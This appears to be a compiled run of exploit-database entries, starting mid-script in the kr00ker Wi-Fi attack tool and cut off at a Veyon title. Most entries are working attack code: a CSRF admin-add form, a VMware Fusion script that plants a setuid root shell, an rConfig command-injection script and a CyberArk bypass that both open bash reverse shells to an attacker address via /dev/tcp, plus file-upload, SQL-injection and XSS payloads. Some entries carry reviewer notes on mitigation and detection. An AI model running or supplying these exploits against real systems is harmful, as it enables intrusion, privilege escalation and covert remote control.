sniffed_pkt, append=True) wrpcap("dec_pkts.pcap", dec_pkt, append=True) # Uncomment this if you need a one-shoot PoC decryption #sys.exit(0) #else: #print("["+str(datetime.now().time())+"][DEBUG] This data decryption with all zero TK went wrong") #pass def run_disassociation(self): # Run disassociate function in a background thread try: self.disassociate() except KeyboardInterrupt: print("\n["+str(datetime.now().time())+"][!] 
Exiting, caught keyboard interrupt") return def main(): # Passing arguments parser = argparse.ArgumentParser(prog="kr00ker.py", usage="%(prog)s -i <interface-name> -s <SSID> -c <MAC-client> -n <num-packets> -r <reason-id> -t <target-id> -w <wifi-channel> -d <delay>") parser.add_argument("-i", "--interface", required=True, help="The Interface name that you want to send packets out of, it must be set in monitor mode", type=str) parser.add_argument("-b", "--bssid", required=True, help="The MAC address of the Access Point to test", type=str) parser.add_argument("-c", "--client", required=True, help="The MAC address of the Client Device to test", type=str) parser.add_argument("-n", "--number", required=False, help="The Number of disassociation packets you want to send", type=int, default=1) parser.add_argument("-r", "--reason", required=False, help="The Reason identifier of disassociation packets you want to send, accepted values from 1 to 99", type=int, default=0) parser.add_argument("-t", "--target", required=False, help="The Target identifier", choices=["ap", "client"], type=str, default="ap") parser.add_argument("-w", "--wifi_channel", required=False, help="The WiFi channel identifier", type=int, default="1") parser.add_argument("-d", "--delay", required=False, help="The delay for disassociation frames", type=int, default="4") args = parser.parse_args() # Print the kr00ker logo print(LOGO) # Start the fun!! 
try: interface = args.interface ap_mac = args.bssid.lower() client_mac = args.client.lower() reason = args.reason target_channel = args.wifi_channel n_pkts = args.number delay = args.delay # Set the selected channel if target_channel in range(1, 14): os.system("iwconfig " + interface + " channel " + str(target_channel)) else: print("["+str(datetime.now().time())+"][-] Exiting, the specified channel "+target_channel+" is not valid") exit(1) # Check if valid device MAC Addresses have been specified if client_mac == "ff:ff:ff:ff:ff:ff" or ap_mac == "ff:ff:ff:ff:ff:ff": print("["+str(datetime.now().time())+"][-] Exiting, the specified FF:FF:FF:FF:FF:FF broadcast MAC address is not valid") exit(1) # Check if a valid reason have been specified if reason not in range(1,99): print("Exiting, specified a not valid disassociation Reason ID: "+str(reason)) exit(1) # Set the MAC address of the target if args.target == "client": target_mac = client_mac other_mac = ap_mac print("["+str(datetime.now().time())+"][+] The Client device "+target_mac+" will be the target") else: target_mac = ap_mac other_mac = client_mac print("["+str(datetime.now().time())+"][+] The AP "+target_mac+" will be the target") # Krooker instance initialization krooker = Krooker(interface, target_mac, other_mac, reason, n_pkts, delay) # Start a background thread to send disassociation packets k_th = threading.Thread(target=krooker.run_disassociation) k_th.daemon = True # This does not seem to be useful k_th.start() # Start packet interception s_filter = "ether src "+str(target_mac)+" and ether dst "+str(other_mac)+" and type Data" sniff(iface=krooker.interface, filter=s_filter, prn=krooker.check_packet) except KeyboardInterrupt: print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt") k_th.join() sys.exit(0) except scapy.error.Scapy_Exception: print("["+str(datetime.now().time())+"][!] 
Exiting, your wireless interface seems not in monitor mode") sys.exit(1) if __name__ == "__main__": main()
-
Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.exagate.com/
# Software Link: https://www.exagate.com/sysguard-6001
# Version: SYSGuard 6001

HTML CSRF PoC :

<!--
  The form below posts to kulyon.php with a fixed username/password/privilege set
  and carries no anti-CSRF token; the request is accepted on the strength of the
  browser's ambient session alone (presumably a cookie -- confirm against the
  device). Mitigation on the application side: require a per-session token that
  kulyon.php validates, set SameSite on the session cookie, and verify the
  Origin/Referer header for state-changing requests. Detection: POST requests to
  kulyon.php whose Referer/Origin is not the device's own origin.
-->
<html>
  <body>
  <form action="http://target/kulyon.php" method="POST">
      <input type="hidden" name="username" value="joke" />
      <input type="hidden" name="password" value="159384" />
      <input type="hidden" name="privilege" value="0" />
      <input type="hidden" name="button" value="Ekle" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
VMware Fusion 11.5.2 - Privilege Escalation
# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
# Date: 2020-03-17
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.vmware.com/products/fusion.html
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
# Versions:
#   VMware Fusion Professional 11.5.1 (15018442)
#   VMware Fusion Professional 11.5.2 (15794494)
#
# Tested on: macOS 10.14.6
# CVE : CVE-2020-3950
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
#
# NOTE(review): what this script leaves behind, for anyone triaging a host:
#   * ~/Contents/Library/services/VMware USB Arbitrator Service  (user-written script)
#   * ~/a/b/c/Open VMware USB Arbitrator Service                  (hard link to the
#     VMware helper in /Applications)
#   * $HOME/.woot                                                 (setuid-root copy of
#     /bin/bash, mode 4755)
# The mechanism is presumably that the setuid helper resolves the service binary
# relative to its own location, so the hard link redirects it into the user's tree
# -- confirm against VMSA-2020-0005. Hunting for hard links to Fusion's service
# helpers outside /Applications and for setuid files under home directories covers
# both the artefact and the effect.
#
#!/bin/bash
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services

# Unquoted heredoc: $HOME is expanded by this shell at write time, so the written
# file contains the literal path, not the variable.
cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF

chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service
cd ~/a/b/c
# Hard link (not symlink) to the vendor helper; errors are silenced.
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
# ${p?} aborts the script if the background PID was somehow not captured.
kill ${p?}
wait
echo "Sleeping for 7 seconds"
sleep 7
# -p keeps the effective uid when bash runs setuid.
$HOME/.woot -p
-
ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
# Author: Ivan Marmolejo
# Date: 2020-03-22
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# Tested Version: 5.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.3

Steps to Produce the Crash:
1.- Run python code: ProficySCADA.py
2.- Copy content to clipboard
3.- Open "ProficySCADA for iOS"
4.- Add
5.- Username --> admin
6.- Paste ClipBoard on "Password"
7.- Add
8.- Connect
9.- Crashed

#!/usr/bin/env python
# Generates the 257-byte 'A' string that is pasted into the Password field.
# The crash is local to the app (no remote trigger is shown); the fix is a length
# limit on the field before it is handed to whatever parses it.
buffer = "\x41" * 257
print (buffer)
-
Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)
# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC) # Google Dork: N/A # Date: 2020-02-21 # Exploit Author: Cem Onat Karagun of Diesec GmBH # Vendor Homepage: https://www.google.com/ # Version: Google Chrome 80.0.3987.87 # Tested on: Windows x64 / Linux Debian x64 / MacOS # CVE: CVE-2020-6404 # PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8 # Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256 Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7f2cbf9ad700 (LWP 3275)] [----------------------------------registers-----------------------------------] RAX: 0x7f2cbe98d100 --> 0x41b58ab3 RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 RCX: 0x1fffffffffffffff RDX: 0x7f2cbeb8bdf4 --> 0x0 RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0 RDI: 0x0 RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 --> 0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...) RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 RIP: 0x559e50c11189 (<RangeFromBufferIndex()+377>: mov cl,BYTE PTR [rcx+0x7fff8000]) R8 : 0xfffffffffffffff8 R9 : 0x0 R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('') R11: 0x7f2cbe98d100 --> 0x41b58ab3 R12: 0xfe597d31a20 --> 0x0 R13: 0x7f2cbeb8bde8 --> 0x0 R14: 0x0 R15: 0x2 EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction OVERFLOW) [-------------------------------------code-------------------------------------] 0x559e50c1117e <RangeFromBufferIndex()+366>: lea r8,[rdi-0x8] 0x559e50c11182 <RangeFromBufferIndex()+370>: mov rcx,r8 0x559e50c11185 <RangeFromBufferIndex()+373>: shr rcx,0x3 => 0x559e50c11189 <RangeFromBufferIndex()+377>: mov cl,BYTE PTR [rcx+0x7fff8000] 0x559e50c1118f <RangeFromBufferIndex()+383>: test cl,cl 0x559e50c11191 <RangeFromBufferIndex()+385>: jne 0x559e50c11418 <RangeFromBufferIndex()+1032> 0x559e50c11197 <RangeFromBufferIndex()+391>: add rdi,0xffffffffffffffff 0x559e50c1119b 
<RangeFromBufferIndex()+395>: mov rcx,rdi [------------------------------------stack-------------------------------------] 0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0 0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0 0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0 0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0 0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 --> 0x602000098630 --> 0x200000003 --> 0x0 0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0 0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000559e50c11189 in MappingForIndex () at ../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450 450 ../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No such file or directory. <!DOCTYPE html> <head> <script type="text/javascript"> document.addEventListener("DOMContentLoaded", function(){ find(decodeURIComponent('\uFFFC')); }); </script> </head> <body> <legend></legend> </body> </html>
-
Wordpress Plugin PicUploader 1.0 - Remote File Upload
* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload
* Google Dork: N/A
* Date: 2020.03.22
* Exploit Author: Milad Karimi
* Vendor Homepage: https://github.com/xiebruce/PicUploader
* Software Link: https://github.com/xiebruce/PicUploader
* Category : webapps
* Version: 1.0
* Tested on: windows 10 , firefox
* CVE : N/A

Vulnerable Source:

// Lines are quoted out of order (grep-style); the data flow is:
//   line 72/80: $_FILES[$plugin] is taken from the request without authentication
//               shown here,
//   line 81/87: $dest is built from APP_PATH/.tmp plus the client-supplied file name,
//   line 88:    move_uploaded_file() stores it there -- no extension or MIME
//               allowlist appears anywhere in the quoted code.
// Fix on the plugin side: allowlist extensions, generate the stored name server-side,
// keep the directory outside the web root (or deny PHP execution in it), and
// require an authenticated request with a nonce.
88: move_uploaded_file move_uploaded_file($tmp_name, $dest))
86: foreach($files['tmp_name'] as $key=>$tmp_name)
80: $files = $_FILES['file']){
72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)),
87: $dest = $tmpDir . '/' . $files['name'][$key];
81: $tmpDir = APP_PATH . '/.tmp';
24: define('APP_PATH', strtr(__DIR__, '\\', '/')); // define()
80: $files = $_FILES['file']){
72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)),
80: if(isset($_FILES['file']) && $files = $_FILES['file'])
84: if(is_array($files['tmp_name']))

Exploit:

<?php
$shahab="file.jpg";
// NOTE(review): this URL has no '/' between "plugins" and "PicUploader-master",
// while the "Location File" line below uses plugins/PicUploader/ -- one of the two
// is likely a typo in the write-up.
$ch = curl_init("http://localhost/wordpress/wp-content/pluginsPicUploader-master/index.php");
curl_setopt($ch, CURLOPT_POST, true);
// The '@file' upload form is the legacy cURL syntax; PHP 5.6+ disables it by
// default and PHP 7 removed it, so this PoC is tied to older PHP builds.
curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location File: http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg
-
rConfig 3.9.4 - 'search.crud.php' Remote Command Injection
# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection # Date: 2020-03-21 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.rconfig.com # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Version: rConfig 3.9.4 # Tested on: Cent OS 7 (1908) # CVE: CVE-2020-10879 #!/usr/bin/python3 import requests import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port") exit() host = sys.argv[1] username = sys.argv[2] password = sys.argv[3] attacker_ip = sys.argv[4] attacker_port = sys.argv[5] login_url = host + "/lib/crud/userprocess.php" payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port) encoded_payload = urllib.parse.quote_plus(payload) def exploit(): s = requests.Session() res = s.post( login_url, data={ 'user': username, 'pass': password, 'sublogin': 1 }, verify=False, allow_redirects=True ) injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload) res = s.get(injection_url, verify=False) if res.status_code != 200: print("[~] Failed to connect") if __name__ == '__main__': exploit()
-
CyberArk PSMP 10.9.1 - Policy Restriction Bypass
# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass
# Google Dork: NA
# Date: 2020-02-25
# Exploit Author: LAHBAL Said
# Vendor Homepage: https://www.cyberark.com/
# Software Link: https://www.cyberark.com/
# Version: PSMP <=10.9.1
# Tested on: PSMP 10.9 & PSMP 10.9.1
# CVE : N/A
# Patched : PSMP >= 11.1

[Prerequisites]
Policy allows us to overwrite PSMRemoteMachine

[Description]
An issue was discovered in CyberArk Privileged Session Manager SSH Proxy (PSMP) through 10.9.1. All recording mechanisms (Keystroke, SSH Text Recorder and video) can be evaded because user entries are not properly validated. Commands executed in a reverse shell are not monitored. The connection process will freeze just after the "session is being recorded" banner, and all the commands we enter afterwards are not monitored.

------------------------------------------
[Additional Information]
We can get a reverse shell (or execute any command we want) on the remote target and be completely invisible to CyberArk. In the logs, we have only the PSMConnect and PSMDisconnect events.

Here are the details of the attack :

1. I connect through the CyberArk PSMP server using this connection string :
ssh <vaultUserName>%username+address%'remoteMachine bash -i >& /dev/tcp/<AttackerIP>/<AttackerPort0>&1'@<psmpServer>

Example :
ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >& /dev/tcp/192.168.0.10/443 0>&1'@psmp

3. This connection string will :
- Connect me to linux01 using the sharedLinuxAccount account that is stored in CyberArk and to which I have access.
- Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is listening on port 443 for this test).

4. The connection process will freeze just after the "The sessions is being recorded" banner

5. I get a reverse shell on which no commands are monitored.

Note 1 : The command that created the reverse shell is NOT captured by CyberArk.
Note 2 : sshd_config has been set with these parameters :
PSMP_AdditionalDelimiter %
PSMP_TargetAddressPortAdditionalDelimiter +

------------------------------------------
[VulnerabilityType Other]
Bypass of all recording mechanisms (Keystroke, SSH Text Recorder and video)

------------------------------------------
[Vendor of Product]
CyberArk

------------------------------------------
[Affected Product Code Base]
PSMP - <=10.9.1

------------------------------------------
[Affected Component]
/opt/CARKpsmp/bin/psmpserver

------------------------------------------
[Attack Type]
Local

------------------------------------------
[CVE Impact Other]
The vulnerability allows you to connect through the CyberArk PSMP server while bypassing all recording mechanisms

------------------------------------------
[Attack Vectors]
To exploit the vulnerability, someone must connect through PSMP using a crafted connection string.

------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
-
FIBARO System Home Center 5.021 - Remote File Include
# Exploit Title: FIBARO System Home Center 5.021 - Remote File Include
# Date: 2020-03-22
# Author: LiquidWorm
# Vendor: https://www.fibaro.com
# CVE: N/A

Vendor: FIBAR GROUP S.A.
Product web page: https://www.fibaro.com
Affected version: Home Center 3, Home Center 2, Home Center Lite
                  5.021.38
                  4.580
                  4.570
                  4.540
                  4.530
                  4.510
                  4.180

Summary: Imagine that you live in a house where everything happens by itself. FIBARO Smart Home takes care of your everyday comfort and the safety of all family members and, in the meantime, saves energy on every single occasion. All this is possible thanks to the Home Center 2 smart home HUB. Home Center 2 is an indispensable part of the FIBARO System, without which the rest of the home automation devices would be only beautiful objects. The smart home HUB collects and analyzes information about devices, lets them communicate with each other, and thus directs the operation of the entire system and takes care of its security.

Desc: The smart home solution is vulnerable to a remote Cross-Site Scripting attack, triggered via a Remote File Inclusion issue, by including arbitrary client-side dynamic scripts (JavaScript, VBScript) through the undocumented proxy API and its url GET parameter. This allows hijacking the current session of the user or changing the look of the page by changing the HTML.

Tested on: Apache/2.2.16 (Debian)
           nginx/1.9.5
           nginx/1.8.0
           lighttpd/1.4.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5563
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5563.php

04.02.2020

--

http://10.0.0.2:8880/api/proxy?url=https://www.zeroscience.mk/pentest/XSS.svg

$ cat /pentest/XSS.svg
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
-
Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
# Dork: inurl:"index.php?option=com_hdwplayer"
# Date: 2020-03-23
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.hdwplayer.com/
# Software Link: https://www.hdwplayer.com/download/
# Version: 4.2
# Tested on: Debian/Nginx/Joomla! 3.9.11

##########################################################################
#Vulnerability details
##########################################################################
File: components/com_hdwplayer/models/search.php
Func: HdwplayerModelSearch::getsearch
Line: 33

16 class HdwplayerModelSearch extends HdwplayerModel {
...snip...
30 	function getsearch() {
31 		$db = JFactory::getDBO();
// 'string' filtering from JRequest::getVar() strips tags but does not escape
// SQL quote characters, so $search is still attacker-controlled text here.
32 		$search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');
// Line 33 is the sink: the POST value is interpolated straight into the query.
// Fix: build the LIKE operands with the driver's quoting, e.g.
// $db->quote('%' . $db->escape($search, true) . '%', false), or use bound
// parameters, instead of string concatenation.
33 		$query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')"; //!!!
34
35 		$db->setQuery($query);
36 		$output = $db->loadObjectList();
37 		return($output);
38 	}
39
40 }
41
42 ?>

##########################################################################
#PoC
##########################################################################
$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch
-
UliCMS 2020.1 - Persistent Cross-Site Scripting
# Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2019-03-24 # Exploit Author: SunCSR # Vendor Homepage: https://en.ulicms.de # Software Link: https://en.ulicms.de/current_versions.html # Version: 2020.1 # Tested on: Windows # CVE : CVE-2020-12704 ### Vulnerability : Stored Cross-Site Scripting # Description A stored cross-site-scripting security issue in the save page feature Url : http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20 Request Type: POST Vulnerable Parameter : "content" Payload : content=<script>alert('XSS')</script> #POC POST /ulicms/admin/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: */* Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 866 Origin: http://TARGET Connection: close Cookie: 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7 csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=20 &slug=lorem_ipsum&title=Lorem+Ipsum&alternate_title=&show_headline=1&type=page&language=de&menu=top&position=15 &parent_id=NULL&active=1&target=_self&hidden=0&category_id=1&menu_image=&link_url=&link_to_language= &meta_description=&meta_keywords=&robots=&article_author_name=&article_author_email=&article_date=&excerpt=&og_title= &og_description=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=&list_order_by=title &list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url= &text_position=before&article_image=&author_id=1&group_id=1&comments_enabled=null&cache_control=auto&theme= &access%5B%5D=all&custom_data=%7B%7D&content=<script>alert('XSS')</script>&csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb 
### History ============= 2019-03-18 Issue discovered 2019-04-18 Vendor contacted 2019-04-18 Vendor response and hotfix 2019-04-24 Vendor releases fixed versions
-
WordPress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
# Date: 2020-02-18
# Vendor Homepage: https://wpforms.com
# Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.8.2 and below
# CVE : CVE-2020-10385

1. Description

WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin's Form Builder module were found to be vulnerable to stored XSS, as they did not sanitize user-given input properly. While this does not pose a high security threat, being an authenticated XSS vulnerability, an attacker can potentially exploit it to perform malicious actions on a WordPress multisite installation: to have a super admin's cookies sent to the attacker, or to redirect the super admin to another domain, for example a phishing page designed to show that they have been logged out and need to log back in, thus compromising their credentials. The form builder's "preview" function was also vulnerable to reflected XSS. All WordPress websites using WPForms version 1.5.8.2 and below are affected.

2.
Proof of Concept POST /wp-admin/admin-ajax.php HTTP/1.1 Host: ptest.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ptest.com/wp-admin/admin.php?page=wpforms-builder&view=settings&form_id=23 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 3140 Origin: http://ptest.com Connection: close Cookie: wp-saving-post=15-saved; wordpress_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cf826697f923b7f17c30049eea275c6523b7e2418ab354e106c50f0314b9bdae9; comment_author_email_db156a460ca831632324809820a538ce=dev-email@flywheel.local; comment_author_db156a460ca831632324809820a538ce=jinson; wp-settings-time-1=1581973079; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cbaecd49d797bff21499da712891744737c67fd481d59e04a952554579f26c637 
action=wpforms_save_form&data=%5B%7B%22name%22%3A%22id%22%2C%22value%22%3A%2223%22%7D%2C%7B%22name%22%3A%22field_id%22%2C%22value%22%3A%2213%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bid%5D%22%2C%22value%22%3A%2211%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Btype%5D%22%2C%22value%22%3A%22text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blabel%5D%22%2C%22value%22%3A%22Single+Line+Text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdescription%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bsize%5D%22%2C%22value%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bplaceholder%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_count%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_mode%5D%22%2C%22value%22%3A%22characters%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdefault_value%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bcss%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Binput_mask%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bform_title%5D%22%2C%22value%22%3A%22Security+Test+WPForms%22%7D%2C%7B%22name%22%3A%22settings%5Bform_desc%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description+2%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bform_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text%5D%22%2C%22value%22%3A%22Submit%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text_processing%5D%22%2C%22value%22%3A%22Sending...%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bhoneypot%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotification_enable%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bemail%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnoti
fications%5D%5B1%5D%5Bsubject%5D%22%2C%22value%22%3A%22New+Security+Test+WPForms+Entry%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_name%5D%22%2C%22value%22%3A%22ptest%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_address%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Breplyto%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%7Ball_fields%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Btype%5D%22%2C%22value%22%3A%22message%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%3Cp%3EThanks+for+contacting+us!+We+will+be+in+touch+with+you+shortly.%3C%2Fp%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage_scroll%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bpage%5D%22%2C%22value%22%3A%222%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bredirect%5D%22%2C%22value%22%3A%22%22%7D%5D&id=23&nonce=938cf431d2 3. Timeline Vulnerability reported to the WPForms team – February 18, 2020 WPForms version 1.5.9 containing the fix released – March 5, 2020
-
Veyon 4.3.4 - 'VeyonService' Unquoted Service Path
